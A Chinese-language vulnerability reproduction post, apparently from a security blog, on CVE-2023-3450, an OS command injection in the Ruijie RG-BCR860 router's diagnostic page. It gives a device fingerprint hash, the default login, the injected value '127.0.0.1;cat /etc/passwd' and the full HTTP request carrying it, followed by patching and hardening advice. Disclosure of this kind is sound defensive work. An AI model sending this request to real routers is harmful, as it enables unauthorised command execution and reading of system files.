CVE-2023-3450：Ruijie RG-BCR860 后台命令执行漏洞

关注我们❤️，添加星标🌟，一起学安全！ 作者：lyc@Timeline Sec 本文字数：786 阅读时长：1～3min 声明：仅供学习参考使用，请勿用作违法用途，否则后果自负

0x01 简介

北京星网锐捷网络技术有限公司，行业领先的ICT基础设施及行业解决方案提供商，主营业务为网络设备、网络安全产品及云桌面解决方案的研发、设计和销售。Ruijie Networks RG-BCR860是该公司的一款商业云路由器。

0x02 漏洞概述

漏洞编号：CVE-2023-3450

Ruijie RG-BCR860 2.5.13版本存在操作系统命令注入漏洞，该漏洞源于组件Network Diagnostic Page存在问题，会导致操作系统命令注入。

0x03 影响版本

Ruijie RG-BCR860 2.5.13 版本

0x04 环境搭建

非开源产品，无法搭建。

指纹特征：icon_hash="-399311436"

0x05 漏洞复现

该漏洞属于后台漏洞，需要输入默认密码admin进入后台

点击最下角的”网络诊断“，在”Tracert检测“的”地址“框中，输入127.0.0.1;cat /etc/passwd，接着点 击”开始检测“，运行输入的命令，发现在检测框中回显了执行的命令。

抓取命令执行的数据包如下：

GET /cgi-bin/luci/;stok=eec2b12d06840b05a31fe74e08bcdda2/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=3 HTTP/1.1 
Host: xx.xx.xx.xx:xxxx
User-Agent : Mozilla/5 .0 (Windows NT 10 .0 ; Win64 ; x64 ; rv:109 .0) Gecko/20100101 Firefox/115 .0
Accept : */*
Accept-Language : zh-CN ,zh;q=0 .8 ,zh-TW;q=0 .7 ,zh-HK;q=0 .5 ,en-US;q=0 .3 ,en;q=0 .2 Accept-Encoding : gzip , deflate
X-Requested-With : XMLHttpRequest
Connection : close
Referer : http://xx.xx.xxx.xxx:xxxx/cgi-
bin/luci/;stok=aec2b12d06840c05a31fe74e08bcdda2/admin/diagnosis
Cookie : sysauth=42c707ae8cf9ac550c4d24d7f8b92f76

命令执行成功回显截图

0x06 修复方式

目前厂商已发布升级补丁以修复漏洞，该漏洞由于正常功能过滤不严格导致存在命令注入，并且需要高权 限账号登录操作，建议修改登录密码为强口令，通过白名单控制访问原地址。

参考链接

https://www.wevul.com/1928.html

历史漏洞

暂无